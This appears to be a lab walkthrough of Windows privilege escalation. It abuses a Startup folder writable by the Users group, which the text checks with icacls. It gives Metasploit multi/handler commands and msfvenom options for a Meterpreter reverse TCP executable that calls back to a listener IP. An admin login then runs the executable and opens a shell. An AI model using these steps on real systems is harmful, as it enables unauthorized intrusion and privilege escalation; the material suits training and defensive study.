✨Startup Applications
Startup applications in Windows are programs or scripts that automatically initiate when a user logs into the system. In the context of privilege escalation (privesc), attackers often leverage the execution of malicious code during system startup to elevate their privileges.
Overview
we are going to use a tool called icalcs.exe
icacls.exe
icacls.exe
Purpose:
icacls.exe
is a command-line utility that allows users to display and modify permissions on objects in the file system.Usage: Used for viewing or modifying ACLs, which define the permissions users and groups have on a particular file or directory.
Access Control List (ACL): A list associated with an object (e.g., file, directory) that specifies the permissions granted or denied to users or groups.
Access Control Lists (ACLs) are a fundamental concept in computer security, specifically in the context of operating systems like Windows. ACLs define permissions and access rights to resources, such as files, folders, or registry keys.
We are going to run this command
icacls.exe
: This is the executable for the command-line tool that deals with ACLs."C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
: This is the path to the Startup folder where programs are launched automatically when a user logs in.
The BUILTIN\Users group is a default Windows security group that includes all user accounts created on the system. When Full Control permissions <F> are granted to this group, it means that members of the Users group have complete access and control over the specified resources, such as files, directories, or services.
Escalation
To gain elevated privileges, head out on your Kali machine, load msfconsole and use the multi/handler:
Open command prompt and type: msfconsole
In Metasploit (msf > prompt) type: use multi/handler
In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
In Metasploit (msf > prompt) type: run
now on another terminal generate the payload:
-p windows/meterpreter/reverse_tcp
: Specifies the payload as a reverse TCP Meterpreter shell for Windows.LHOST=10.10.141.112
: Sets the local host IP address to 10.10.141.112. This is the IP address where the reverse shell will connect back.-f exe
: Specifies the output format as an executable (exe) file.-o y.exe
: Defines the output file as "y.exe."
I then made a simple local python server and went on the windows machine to download my file in the startup folder located at :
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
Now we are going to simulate a admin login to our machie with the payload injected in the startup programs
Disconnect from the session and launch your msfconsole:
Then connect to the box with the TCM account
We connect to the rdesktop with admin credentials, the startup payload executes and our meterpreter session returns us a shell.
Last updated